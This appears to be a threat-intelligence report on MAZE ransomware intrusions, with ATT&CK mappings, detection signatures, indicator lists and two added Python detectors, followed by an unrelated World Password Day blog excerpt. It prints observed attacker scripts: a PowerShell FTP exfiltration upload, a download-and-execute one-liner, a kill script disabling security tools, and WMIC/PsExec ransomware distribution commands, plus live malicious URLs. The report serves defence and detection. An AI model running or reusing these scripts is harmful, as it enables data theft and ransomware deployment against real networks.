  • Prior to deploying MAZE ransomware, threat actors employed the 7zip utility to archive data from across various corporate file shares. These archives were then exfiltrated to an attacker-controlled server via FTP using the WinSCP utility.

In addition to data theft, actors deploy MAZE ransomware to encrypt files identified on the victim network. Notably, the aforementioned MAZE panel has an option to specify the date on which ransom demands will double, likely intended to create a sense of urgency around their demands.

  • Five days after data was exfiltrated from a victim environment, the actor copied a MAZE ransomware binary to 15 hosts within the victim environment and successfully executed it on a portion of these systems.
  • Attackers employed batch scripts and a series of .txt files containing host names to distribute and execute MAZE ransomware on many servers and workstations across the victim environment.
  • An actor deployed MAZE ransomware to tens of hosts, explicitly logging into each system using a domain administrator account created earlier in the intrusion.
  • Immediately following the exfiltration of sensitive data, the actors began deployment of MAZE ransomware to hosts across the network. In some cases, thousands of hosts were ultimately encrypted. The encryption process proceeded as follows:
    • A batch script named start.bat was used to execute a series of secondary batch scripts with names such as xaa3x.bat or xab3x.bat.
    • Each of these batch scripts contained a series of commands that employed the copy command, WMIC, and PsExec to copy and execute a kill script (windows.bat) and an instance of MAZE ransomware (sss.exe) on hosts across the impacted environment.
    • Notably, forensic analysis of the impacted environment revealed MAZE deployment scripts targeting ten times as many hosts as were ultimately encrypted.

Implications

Based on our belief that the MAZE ransomware is distributed by multiple actors, we anticipate that the TTPs used throughout incidents associated with this ransomware will continue to vary somewhat, particularly in terms of the initial intrusion vector. For more comprehensive recommendations for addressing ransomware, please refer to our Ransomware Protection and Containment Strategies blog post and the linked white paper.

Mandiant Security Validation Actions

Organizations can validate their security controls against more than 20 MAZE-specific actions with Mandiant Security Validation. Please see our Headline Release Content Updates – April 21, 2020 on the Mandiant Security Validation Customer Portal for more information.

  • A100-877 - Active Directory - BloodHound, CollectionMethod All
  • A150-006 - Command and Control - BEACON, Check-in
  • A101-030 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #1
  • A101-031 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #2
  • A101-032 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #3
  • A100-878 - Command and Control - MAZE Ransomware, C2 Check-in
  • A100-887 - Command and Control - MAZE, DNS Query #1
  • A100-888 - Command and Control - MAZE, DNS Query #2
  • A100-889 - Command and Control - MAZE, DNS Query #3
  • A100-890 - Command and Control - MAZE, DNS Query #4
  • A100-891 - Command and Control - MAZE, DNS Query #5
  • A100-509 - Exploit Kit Activity - Fallout Exploit Kit CVE-2018-8174, Github PoC
  • A100-339 - Exploit Kit Activity - Fallout Exploit Kit CVE-2018-8174, Landing Page
  • A101-033 - Exploit Kit Activity - Spelevo Exploit Kit, MAZE C2
  • A100-208 - FTP-based Exfil/Upload of PII Data (Various Compression)
  • A104-488 - Host CLI - Collection, Exfiltration: Active Directory Reconnaissance with SharpHound, CollectionMethod All
  • A104-046 - Host CLI - Collection, Exfiltration: Data from Local Drive using PowerShell
  • A104-090 - Host CLI - Collection, Impact: Creation of a Volume Shadow Copy
  • A104-489 - Host CLI - Collection: Privilege Escalation Check with PowerUp, Invoke-AllChecks
  • A104-037 - Host CLI - Credential Access, Discovery: File & Directory Discovery
  • A104-052 - Host CLI - Credential Access: Mimikatz
  • A104-167 - Host CLI - Credential Access: Mimikatz (2.1.1)
  • A104-490 - Host CLI - Defense Evasion, Discovery: Terminate Processes, Malware Analysis Tools
  • A104-491 - Host CLI - Defense Evasion, Persistence: MAZE, Create Target.lnk
  • A104-500 - Host CLI - Discovery, Defense Evasion: Debugger Detection
  • A104-492 - Host CLI - Discovery, Execution: Antivirus Query with WMI, PowerShell
  • A104-374 - Host CLI - Discovery: Enumerate Active Directory Forests
  • A104-493 - Host CLI - Discovery: Enumerate Network Shares
  • A104-481 - Host CLI - Discovery: Language Query Using PowerShell, Current User
  • A104-482 - Host CLI - Discovery: Language Query Using reg query
  • A104-494 - Host CLI - Discovery: MAZE, Dropping Ransomware Note Burn Directory
  • A104-495 - Host CLI - Discovery: MAZE, Traversing Directories and Dropping Ransomware Note, DECRYPT-FILES.html Variant
  • A104-496 - Host CLI - Discovery: MAZE, Traversing Directories and Dropping Ransomware Note, DECRYPT-FILES.txt Variant
  • A104-027 - Host CLI - Discovery: Process Discovery
  • A104-028 - Host CLI - Discovery: Process Discovery with PowerShell
  • A104-029 - Host CLI - Discovery: Remote System Discovery
  • A104-153 - Host CLI - Discovery: Security Software Identification with Tasklist
  • A104-083 - Host CLI - Discovery: System Info
  • A104-483 - Host CLI - Exfiltration: PowerShell FTP Upload
  • A104-498 - Host CLI - Impact: MAZE, Desktop Wallpaper Ransomware Message
  • A104-227 - Host CLI - Initial Access, Lateral Movement: Replication Through Removable Media
  • A100-879 - Malicious File Transfer - Adfind.exe, Download
  • A150-046 - Malicious File Transfer - BEACON, Download
  • A100-880 - Malicious File Transfer - Bloodhound Ingestor Download, C Sharp Executable Variant
  • A100-881 - Malicious File Transfer - Bloodhound Ingestor Download, C Sharp PowerShell Variant
  • A100-882 - Malicious File Transfer - Bloodhound Ingestor Download, PowerShell Variant
  • A101-037 - Malicious File Transfer - MAZE Download, Variant #1
  • A101-038 - Malicious File Transfer - MAZE Download, Variant #2
  • A101-039 - Malicious File Transfer - MAZE Download, Variant #3
  • A101-040 - Malicious File Transfer - MAZE Download, Variant #4
  • A101-041 - Malicious File Transfer - MAZE Download, Variant #5
  • A101-042 - Malicious File Transfer - MAZE Download, Variant #6
  • A101-043 - Malicious File Transfer - MAZE Download, Variant #7
  • A101-044 - Malicious File Transfer - MAZE Download, Variant #8
  • A101-045 - Malicious File Transfer - MAZE Download, Variant #9
  • A101-034 - Malicious File Transfer - MAZE Dropper Download, Variant #1
  • A101-035 - Malicious File Transfer - MAZE Dropper Download, Variant #2
  • A100-885 - Malicious File Transfer - MAZE Dropper Download, Variant #4
  • A101-036 - Malicious File Transfer - MAZE Ransomware, Malicious Macro, PowerShell Script Download
  • A100-284 - Malicious File Transfer - Mimikatz W/ Padding (1MB), Download
  • A100-886 - Malicious File Transfer - Rclone.exe, Download
  • A100-484 - Scanning Activity - Nmap smb-enum-shares, SMB Share Enumeration

Detecting the Techniques

Signature names by platform:

  • MVX (covers multiple FireEye technologies)
    • Bale Detection
    • FE_Ransomware_Win_MAZE_1
  • Endpoint Security
    • WMIC SHADOWCOPY DELETE (METHODOLOGY)
    • MAZE RANSOMWARE (FAMILY)
  • Network Security
    • Ransomware.Win.MAZE
    • Ransomware.Maze
    • Ransomware.Maze

MITRE ATT&CK Mappings

Mandiant currently tracks three separate clusters of activity involved in the post-compromise distribution of MAZE ransomware. Future data collection and analysis efforts may reveal additional groups involved in intrusion activity supporting MAZE operations, or may instead allow us to collapse some of these groups into larger clusters. It should also be noted that ‘initial access’ phase techniques have been included in these mappings, though in some cases this access may have been provided by a separate threat actor(s).

MAZE Group 1 MITRE ATT&CK Mapping

Techniques by ATT&CK tactic category:

  • Initial Access
    • T1133: External Remote Services
    • T1078: Valid Accounts
  • Execution
    • T1059: Command-Line Interface
    • T1086: PowerShell
    • T1064: Scripting
    • T1035: Service Execution
  • Persistence
    • T1078: Valid Accounts
    • T1050: New Service
  • Privilege Escalation
    • T1078: Valid Accounts
  • Defense Evasion
    • T1078: Valid Accounts
    • T1036: Masquerading
    • T1027: Obfuscated Files or Information
    • T1064: Scripting
  • Credential Access
    • T1110: Brute Force
    • T1003: Credential Dumping
  • Discovery
    • T1087: Account Discovery
    • T1482: Domain Trust Discovery
    • T1083: File and Directory Discovery
    • T1135: Network Share Discovery
    • T1069: Permission Groups Discovery
    • T1018: Remote System Discovery
    • T1016: System Network Configuration Discovery
  • Lateral Movement
    • T1076: Remote Desktop Protocol
    • T1105: Remote File Copy
  • Collection
    • T1005: Data from Local System
  • Command and Control
    • T1043: Commonly Used Port
    • T1105: Remote File Copy
    • T1071: Standard Application Layer Protocol
  • Exfiltration
    • T1002: Data Compressed
    • T1048: Exfiltration Over Alternative Protocol
  • Impact
    • T1486: Data Encrypted for Impact
    • T1489: Service Stop

MAZE Group 2 MITRE ATT&CK Mapping

Techniques by ATT&CK tactic category:

  • Initial Access
    • T1193: Spearphishing Attachment
  • Execution
    • T1059: Command-Line Interface
    • T1086: PowerShell
    • T1085: Rundll32
    • T1064: Scripting
    • T1204: User Execution
    • T1028: Windows Remote Management
  • Persistence
    • T1078: Valid Accounts
    • T1050: New Service
    • T1136: Create Account
  • Privilege Escalation
    • T1078: Valid Accounts
    • T1050: New Service
  • Defense Evasion
    • T1078: Valid Accounts
    • T1140: Deobfuscate/Decode Files or Information
    • T1107: File Deletion
    • T1036: Masquerading
  • Credential Access
    • T1003: Credential Dumping
    • T1081: Credentials in Files
    • T1171: LLMNR/NBT-NS Poisoning
  • Discovery
    • T1087: Account Discovery
    • T1482: Domain Trust Discovery
    • T1083: File and Directory Discovery
    • T1135: Network Share Discovery
    • T1069: Permission Groups Discovery
    • T1018: Remote System Discovery
    • T1033: System Owner/User Discovery
  • Lateral Movement
    • T1076: Remote Desktop Protocol
    • T1028: Windows Remote Management
  • Collection
    • T1074: Data Staged
    • T1005: Data from Local System
    • T1039: Data from Network Shared Drive
  • Command and Control
    • T1043: Commonly Used Port
    • T1219: Remote Access Tools
    • T1105: Remote File Copy
    • T1071: Standard Application Layer Protocol
    • T1032: Standard Cryptographic Protocol
  • Exfiltration
    • T1020: Automated Exfiltration
    • T1002: Data Compressed
    • T1048: Exfiltration Over Alternative Protocol
  • Impact
    • T1486: Data Encrypted for Impact

MAZE Group 3 MITRE ATT&CK Mapping (FIN6)

Techniques by ATT&CK tactic category:

  • Initial Access
    • T1133: External Remote Services
    • T1078: Valid Accounts
  • Execution
    • T1059: Command-Line Interface
    • T1086: PowerShell
    • T1064: Scripting
    • T1035: Service Execution
  • Persistence
    • T1078: Valid Accounts
    • T1031: Modify Existing Service
  • Privilege Escalation
    • T1055: Process Injection
    • T1078: Valid Accounts
  • Defense Evasion
    • T1055: Process Injection
    • T1078: Valid Accounts
    • T1116: Code Signing
    • T1089: Disabling Security Tools
    • T1202: Indirect Command Execution
    • T1112: Modify Registry
    • T1027: Obfuscated Files or Information
    • T1108: Redundant Access
    • T1064: Scripting
  • Credential Access
    • T1003: Credential Dumping
  • Discovery
    • T1087: Account Discovery
    • T1482: Domain Trust Discovery
    • T1083: File and Directory Discovery
    • T1069: Permission Groups Discovery
    • T1018: Remote System Discovery
  • Lateral Movement
    • T1097: Pass the Ticket
    • T1076: Remote Desktop Protocol
    • T1105: Remote File Copy
    • T1077: Windows Admin Shares
  • Collection
    • T1074: Data Staged
    • T1039: Data from Network Shared Drive
  • Command and Control
    • T1043: Commonly Used Port
    • T1219: Remote Access Tools
    • T1105: Remote File Copy
    • T1071: Standard Application Layer Protocol
    • T1032: Standard Cryptographic Protocol
  • Exfiltration
    • T1002: Data Compressed
  • Impact
    • T1486: Data Encrypted for Impact
    • T1490: Inhibit System Recovery
    • T1489: Service Stop

Example Commands Observed in MAZE Ransomware Incidents

function Enum-UsersFolders($PathEnum)
{
    $foldersArr = 'Desktop','Downloads','Documents','AppData/Roaming','AppData/Local'

    Get-ChildItem -Path $PathEnum'/c$' -ErrorAction SilentlyContinue
    Get-ChildItem -Path $PathEnum'/c$/Program Files' -ErrorAction SilentlyContinue
    Get-ChildItem -Path $PathEnum'/c$/Program Files (x86)' -ErrorAction SilentlyContinue

    foreach($Directory in Get-ChildItem -Path $PathEnum'/c$/Users' -ErrorAction SilentlyContinue) {

        foreach($SeachDir in $foldersArr) {
            Get-ChildItem -Path $PathEnum'/c$/Users/'$Directory'/'$SeachDir -ErrorAction SilentlyContinue
        }
    }
}

PowerShell reconnaissance script used to enumerate directories

$Dir="C:/Windows/Temp/"
#ftp server
$ftp = "ftp://<IP Address>/incoming/"
$user = "<username>"
$pass = "<password>"
$webclient = New-Object System.Net.WebClient
$webclient.Credentials = New-Object System.Net.NetworkCredential($user,$pass)
#list every sql server trace file
foreach($item in (dir $Dir "*.7z")){
   "Uploading $item..."
   $uri = New-Object System.Uri($ftp+$item.Name)
   $webclient.UploadFile($uri, $item.FullName)
}

Decoded FTP upload PowerShell script

powershell -nop -exec bypass IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:43984/'); Add-FtpFile -ftpFilePath "ftp://<IP  Address>/cobalt_uploads/<file name>" -localFile "<local file path>\ <file name> " -userName "<username>" -password "<password>"

Decoded FTP upload PowerShell script

[…]
echo 7
echo 7
taskkill /im csrss_tc.exe /f
taskkill /im kwsprod.exe /f
taskkill /im avkwctl.exe /f
taskkill /im rnav.exe /f
taskkill /im crssvc.exe /f
sc config CSAuth start= disabled
taskkill /im vsserv.exe /f
taskkill /im ppmcativedetection.exe /f
[…]
taskkill /im sahookmain.exe /f
taskkill /im mcinfo.exe /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Ye
c:\windows\temp\sss.exe

Excerpt from windows.bat kill script

start copy sss.exe \\<internal IP>\c$\windows\temp\
start copy sss.exe \\<internal IP>\c$\windows\temp\

start copy windows.bat \\<internal IP>\c$\windows\temp\
start copy windows.bat \\<internal IP>\c$\windows\temp\

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "c:\windows\temp\sss.exe"

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "c:\windows\temp\sss.exe"

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c c:\windows\temp\windows.bat"

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c c:\windows\temp\windows.bat"

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\sss.exe c:\windows\temp\"

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\sss.exe c:\windows\temp\"

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\windows.bat c:\windows\temp\"

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\windows.bat c:\windows\temp\"

start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\sss.exe

start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\sss.exe

start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\windows.bat

start psexec.exe \\<internal IP> -u < DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\windows.bat

Example commands from MAZE distribution scripts

@echo off
del done.txt
del offline.txt
rem Loop thru list of computer names in file specified on command-line
for /f %%i in (%1) do call :check_machine %%i
goto end
:check_machine
rem Check to see if machine is up.
ping -n 1 %1|Find "TTL=" >NUL 2>NUL
if errorlevel 1 goto down
echo %1
START cmd /c "copy [Location of MAZE binary] \\%1\c$\windows\temp && exit"
timeout 1 > NUL
echo %1 >> done.txt
rem wmic /node:"%1" process call create "regsvr32.exe /i C:\windows\temp\[MAZE binary name]" >> done.txt
START "" cmd /c "wmic /node:"%1" process call create "regsvr32.exe /i C:\windows\temp\[MAZE binary name]" && exit"
goto end
:down
  rem Report machine down
  echo %1 >> offline.txt
:end

Example MAZE distribution script
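The kill script and distribution scripts above leave a recognisable trail in process-creation telemetry: forced kills of security products, services set to disabled, RDP switched on through the registry and firewall, binaries copied to C$\windows\temp and launched remotely with wmic or PsExec. The following detector is an added example written for this page, not code from the Mandiant report; the log format (host|user|command line), the host and user names, and the kill-burst threshold are constructed assumptions, and the process names come from the windows.bat excerpt above.

```python
"""Flag MAZE-style host-preparation and distribution commands in process-creation logs.

Added example (not from the Mandiant report).  The heuristics mirror the
behaviours visible in the windows.bat kill script and the distribution scripts
above.  The log lines are constructed for this example in a simplified
"host|user|command_line" shape, not a real EDR export.
"""
import re
from collections import defaultdict

# Constructed sample of process-creation records (hypothetical hosts and users).
SAMPLE_LOG = """\
WS-014|CORP\\jdoe|taskkill /im vsserv.exe /f
WS-014|CORP\\jdoe|taskkill /im mcinfo.exe /f
WS-014|CORP\\jdoe|taskkill /im rnav.exe /f
WS-014|CORP\\jdoe|sc config CSAuth start= disabled
WS-014|CORP\\jdoe|reg add "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
WS-014|CORP\\jdoe|netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
WS-014|CORP\\jdoe|c:\\windows\\temp\\sss.exe
SRV-DC1|CORP\\svc_backup|start copy sss.exe \\\\10.0.0.25\\c$\\windows\\temp\\
SRV-DC1|CORP\\svc_backup|wmic /node:"10.0.0.25" /user:"CORP\\adminaccount" /password:"x" process call create "cmd.exe /c c:\\windows\\temp\\windows.bat"
SRV-DC1|CORP\\svc_backup|psexec.exe \\\\10.0.0.26 -u CORP\\adminaccount -p "x" -d -h -s -accepteula -nobanner c:\\windows\\temp\\sss.exe
WS-022|CORP\\asmith|taskkill /im notepad.exe /f
WS-022|CORP\\asmith|reg query "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" /v ProductName
"""

# Process names killed in the windows.bat excerpt above; a real deployment would
# use the image names of its own security stack.
SECURITY_IMAGES = {
    "csrss_tc.exe", "kwsprod.exe", "avkwctl.exe", "rnav.exe", "crssvc.exe",
    "vsserv.exe", "ppmcativedetection.exe", "sahookmain.exe", "mcinfo.exe",
}

# (rule name, pattern) pairs; each maps to one behaviour in the scripts above.
RULES = [
    ("service-disabled",     re.compile(r"\bsc\s+config\s+\S+\s+start=\s*disabled", re.I)),
    ("rdp-enabled-registry", re.compile(r"fDenyTSConnections\b.*\s/d\s+0\b", re.I)),
    # "enable=y" tolerates the truncated "enable=Ye" seen in the excerpt
    ("rdp-firewall-opened",  re.compile(r'netsh\s+advfirewall\b.*group="remote desktop".*enable=y', re.I)),
    ("remote-exec-wmic",     re.compile(r"\bwmic\b.*\s/node:.*process\s+call\s+create", re.I)),
    ("remote-exec-psexec",   re.compile(r"\bpsexec(?:\.exe)?\s+\\\\", re.I)),
    ("admin-share-staging",  re.compile(r"\\\\[^\\\s\"]+\\c\$\\windows\\temp", re.I)),
    ("exec-from-temp",       re.compile(r"^[a-z]:\\windows\\temp\\[^\\\s]+\.(?:exe|bat)\s*$", re.I)),
]
TASKKILL = re.compile(r"\btaskkill\b.*\s/im\s+(\S+)", re.I)
KILL_BURST = 3  # constructed threshold: this many forced kills from one host in the batch


def parse(log_text):
    """Yield (host, user, command_line) from the constructed pipe-delimited log."""
    for line in log_text.splitlines():
        if line.strip():
            host, user, cmd = line.split("|", 2)
            yield host, user, cmd


def detect(log_text):
    """Return {host: sorted rule names hit} for every host with at least one hit."""
    hits = defaultdict(set)
    kills = defaultdict(int)
    for host, _user, cmd in parse(log_text):
        for name, rx in RULES:
            if rx.search(cmd):
                hits[host].add(name)
        m = TASKKILL.search(cmd)
        if m:
            kills[host] += 1
            if m.group(1).lower() in SECURITY_IMAGES:
                hits[host].add("security-tool-kill")
    for host, n in kills.items():
        if n >= KILL_BURST:
            hits[host].add("kill-burst")
    return {h: sorted(r) for h, r in hits.items()}


def kill_chain_hosts(log_text, min_rules=2):
    """Hosts showing at least `min_rules` distinct behaviours, i.e. more than a one-off admin command."""
    return sorted(h for h, r in detect(log_text).items() if len(r) >= min_rules)


if __name__ == "__main__":
    for host, rules in detect(SAMPLE_LOG).items():
        print(host, rules)
    print("escalate:", kill_chain_hosts(SAMPLE_LOG))
```

Requiring two or more distinct behaviours per host before escalating keeps a single legitimate `taskkill` or `reg query` (WS-022 above) out of the queue, while the staging host and the target host both surface because the script runs several of these steps back to back.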

Indicators of Compromise

Maze Payloads

064058cf092063a5b69ed8fd2a1a04fe

0f841c6332c89eaa7cac14c9d5b1d35b

108a298b4ed5b4e77541061f32e55751

11308e450b1f17954f531122a56fae3b

15d7dd126391b0e7963c562a6cf3992c

21a563f958b73d453ad91e251b11855c

27c5ecbb94b84c315d56673a851b6cf9

2f78ff32cbb3c478865a88276248d419

335aba8d135cc2e66549080ec9e8c8b7

3bfcba2dd05e1c75f86c008f4d245f62

46b98ee908d08f15137e509e5e69db1b

5774f35d180c0702741a46d98190ff37

5df79164b6d0661277f11691121b1d53

658e9deec68cf5d33ee0779f54806cc2

65cf08ffaf12e47de8cd37098aac5b33

79d137d91be9819930eeb3876e4fbe79

8045b3d2d4a6084f14618b028710ce85

8205a1106ae91d0b0705992d61e84ab2

83b8d994b989f6cbeea3e1a5d68ca5d8

868d604146e7e5cb5995934b085846e3

87239ce48fc8196a5ab66d8562f48f26

89e1ddb8cc86c710ee068d6c6bf300f4

910aa49813ee4cc7e4fa0074db5e454a

9eb13d56c363df67490bcc2149229e4c

a0c5b4adbcd9eb6de9d32537b16c423b

a3a3495ae2fc83479baeaf1878e1ea84

b02be7a336dcc6635172e0d6ec24c554

b40a9eda37493425782bda4a3d9dad58

b4d6cb4e52bb525ebe43349076a240df

b6786f141148925010122819047d1882

b93616a1ea4f4a131cc0507e6c789f94

bd9838d84fd77205011e8b0c2bd711e0

be537a66d01c67076c8491b05866c894

bf2e43ff8542e73c1b27291e0df06afd

c3ce5e8075f506e396ee601f2757a2bd

d2dda72ff2fbbb89bd871c5fc21ee96a

d3eaab616883fcf51dcbdb4769dd86df

d552be44a11d831e874e05cadafe04b6

deebbea18401e8b5e83c410c6d3a8b4e

dfa4631ec2b8459b1041168b1b1d5105

e57ba11045a4b7bc30bd2d33498ef194

e69a8eb94f65480980deaf1ff5a431a6

ef95c48e750c1a3b1af8f5446fa04f54

f04d404d84be66e64a584d425844b926

f457bb5060543db3146291d8c9ad1001

f5ecda7dd8bb1c514f93c09cea8ae00d

f83cef2bf33a4d43e58b771e81af3ecc

fba4cbb7167176990d5a8d24e9505f71

Maze Check-in IPs

91.218.114.11

91.218.114.25

91.218.114.26

91.218.114.31

91.218.114.32

91.218.114.37

91.218.114.38

91.218.114.4

91.218.114.77

91.218.114.79

92.63.11.151

92.63.15.6 

92.63.15.8 

92.63.17.245

92.63.194.20

92.63.194.3

92.63.29.137

92.63.32.2 

92.63.32.52

92.63.32.55

92.63.32.57

92.63.37.100

92.63.8.47

Maze-related Domains

aoacugmutagkwctu[.]onion

mazedecrypt[.]top 

mazenews[.]top

newsmaze[.]top

Maze Download URLs

http://104.168.174.32/wordupd_3.0.1.tmp

http://104.168.198.208/wordupd.tmp

http://104.168.201.35/dospizdos.tmp

http://104.168.201.47/wordupd.tmp

http://104.168.215.54/wordupd.tmp

http://149.56.245.196/wordupd.tmp

http://192.119.106.235/mswordupd.tmp

http://192.119.106.235/officeupd.tmp

http://192.99.172.143/winupd.tmp

http://54.39.233.188/win163.65.tmp

http://91.208.184.174:8079/windef.exe

http://agenziainformazioni[.]icu/wordupd.tmp

http://www.download-invoice[.]site/Invoice_29557473.exe

Malicious Documents

1a26c9b6ba40e4e3c3dce12de266ae10

53d5bdc6bd7904b44078cf80e239d42b

79271dc08052480a578d583a298951c5

a2d631fcb08a6c840c23a8f46f6892dd

ad30987a53b1b0264d806805ce1a2561

c09af442e8c808c953f4fa461956a30f

ee26e33725b14850b1776a67bd8f2d0a

BEACON C2s

173.209.43.61

193.36.237.173

37.1.213.9

37.252.7.142

5.199.167.188

checksoffice[.]me

drivers.updatecenter[.]icu

plaintsotherest[.]net

thesawmeinrew[.]net

updates.updatecenter[.]icu

Cobalt Strike Binaries

7507fe19afbda652e9b2768c10ad639f

a93b86b2530cc988f801462ead702d84

4f57e35a89e257952c3809211bef78ea

bad6fc87a98d1663be0df23aedaf1c62

f5ef96251f183f7fc63205d8ebf30cbf

c818cc38f46c604f8576118f12fd0a63

078cf6db38725c37030c79ef73519c0c

c255daaa8abfadc12c9ae8ae2d148b31

1fef99f05bf5ae78a28d521612506057

cebe4799b6aff9cead533536b09fecd1

4ccca6ff9b667a01df55326fcc850219

Meterpreter C2s

5.199.167.188

Other Related Files

3A5A9D40D4592C344920DD082029B362 (related script)

76f8f28bd51efa03ab992fdb050c8382 (MAZE execution artifact)

b5aa49c1bf4179452a85862ade3ef317 (windows.bat kill script) 

fad3c6914d798e29a3fd8e415f1608f4 (related script)

Tools & Utilities

27304b246c7d5b4e149124d5f93c5b01 (PsExec)

42badc1d2f03a8b1e4875740d3d49336 (7zip)

75b55bb34dac9d02740b9ad6b6820360 (PsExec)

9b02dd2a1a15e94922be3f85129083ac (AdFind)

c621a9f931e4ebf37dace74efcce11f2 (SMBTools)

f413b4a2242bb60829c9a470eea4dfb6 (winRAR) 

Email Sender Domains

att-customer[.]com

att-information[.]com

att-newsroom[.]com

att-plans[.]com

bezahlen-1und1[.]icu

bzst-info[.]icu

bzst-inform[.]icu

bzstinfo[.]icu

bzstinform[.]icu

canada-post[.]icu

canadapost-delivery[.]icu

canadapost-tracking[.]icu

hilfe-center-1und1[.]icu

hilfe-center-internetag[.]icu

trackweb-canadapost[.]icu

Sender Domain Registrant Addresses

abusereceive@hitler.rocks

gladkoff1991@yandex.ru
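Turning the lists above into a usable watchlist has two practical snags: the domains and URLs are published defanged (`[.]`), and hash case is inconsistent (one of the related-file hashes is upper-case). The matcher below is an added example, not part of the Mandiant report; it takes a handful of the indicators listed above, refangs and lower-cases them, also extracts the host from each download URL, and checks constructed telemetry records (hypothetical hosts and values) against the result.

```python
"""Match the MAZE indicators listed above against constructed telemetry.

Added example, not part of the Mandiant report.  Indicators are normalised
(refanged, lower-cased) before comparison, and the host of each download URL
is added as its own indicator so DNS or connection telemetry can hit it too.
"""
import ipaddress
import re

# A few indicators copied from the lists above (hashes, check-in IPs, domains, download URLs).
RAW_IOCS = """
064058cf092063a5b69ed8fd2a1a04fe
3A5A9D40D4592C344920DD082029B362
91.218.114.11
92.63.15.6
mazedecrypt[.]top
drivers.updatecenter[.]icu
http://104.168.174.32/wordupd_3.0.1.tmp
http://agenziainformazioni[.]icu/wordupd.tmp
"""

MD5 = re.compile(r"^[0-9a-f]{32}$")


def refang(s):
    """Turn a defanged indicator back into its real form (only the [.] form appears on this page)."""
    return s.strip().replace("[.]", ".").lower()


def classify(indicator):
    """Bucket one refanged indicator as hash / url / ip / domain."""
    if MD5.match(indicator):
        return "hash"
    if indicator.startswith(("http://", "https://")):
        return "url"
    try:
        ipaddress.ip_address(indicator)
        return "ip"
    except ValueError:
        return "domain"


def load_iocs(text):
    """Return {type: set(indicators)}; URL hosts are also added as ip/domain indicators."""
    buckets = {"hash": set(), "ip": set(), "url": set(), "domain": set()}
    for line in text.splitlines():
        if not line.strip():
            continue
        ind = refang(line)
        kind = classify(ind)
        buckets[kind].add(ind)
        if kind == "url":
            host = ind.split("/", 3)[2].split(":")[0]  # strip scheme, path and port
            buckets[classify(host)].add(host)
    return buckets


IOCS = load_iocs(RAW_IOCS)

# Constructed telemetry: file hashes, DNS lookups and outbound connections from hypothetical hosts.
TELEMETRY = [
    {"host": "WS-014", "kind": "hash",   "value": "3a5a9d40d4592c344920dd082029b362"},
    {"host": "WS-014", "kind": "domain", "value": "MazeDecrypt.top"},
    {"host": "WS-022", "kind": "ip",     "value": "92.63.15.6"},
    {"host": "WS-022", "kind": "domain", "value": "updates.microsoft.com"},
    {"host": "SRV-01", "kind": "ip",     "value": "104.168.174.32"},  # host of a download URL above
    {"host": "SRV-01", "kind": "hash",   "value": "d41d8cd98f00b204e9800998ecf8427e"},  # MD5 of an empty file
]


def match(telemetry, iocs):
    """Return [(host, kind, value)] for records whose normalised value is a known indicator."""
    hits = []
    for rec in telemetry:
        value = refang(rec["value"])
        if value in iocs.get(rec["kind"], ()):
            hits.append((rec["host"], rec["kind"], value))
    return hits


if __name__ == "__main__":
    for hit in match(TELEMETRY, IOCS):
        print(*hit)
```

Normalising both sides is what makes the upper-case hash and the mixed-case DNS record match; a matcher that compares raw strings would silently miss both.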

Mandiant Threat Intelligence will host an exclusive webinar on Thursday, May 21, 2020, at 8 a.m. PT / 11 a.m. ET to provide updated insight and information into the MAZE ransomware threat, and to answer questions from attendees. Register today to reserve your spot.

What Does Your Password Say About Your Preferences?

Passwords say a lot about us. They speak to what we prioritize, what we hold dear. So when I recently saw my wife’s password included the kids’ birthdays and not mine, her priorities were pretty clear. I sure know where I stand! 

Whether it’s children’s birth dates or dog names, passwords reveal who we are and what we value, as we all incorporate the relevant aspects of our lives into our passwords to make them easier to remember. While convenient, this habit could actually cause some security mishaps.  

As we honor the first Thursday in May, better known as World Password Day, let’s take a step back to examine some of these common password habits as well as discuss some tips users can follow to secure their online accounts from any potential hackers. 

Common Password Habits

As human beings, we like to keep things simple — which isn’t always a bad thing. However, it’s not ideal when it comes to password security. According to Tech Times, a recent worldwide survey conducted by the United Kingdom’s National Cyber Security Centre on the most common passwords revealed that 23.2 million people still have passwords mentioning the classic ‘123456’ and that ‘123456789’ is used by 7.7 million people worldwide.  

Aside from common character sequences, many people (including my wife) also use significant dates or names of their loved ones as passwords. According to another recent study conducted by The Harris Poll in partnership with Google, nearly 60% of people studied said their birthday has been integrated into at least one password, 33% use a pet’s name, and 22% use their own name. Other common habits also include reusing the same password across multiple accounts, writing them down on a piece of paper, keeping them in a file on their computer, or keeping them in a file on Dropbox or a similar platform.  

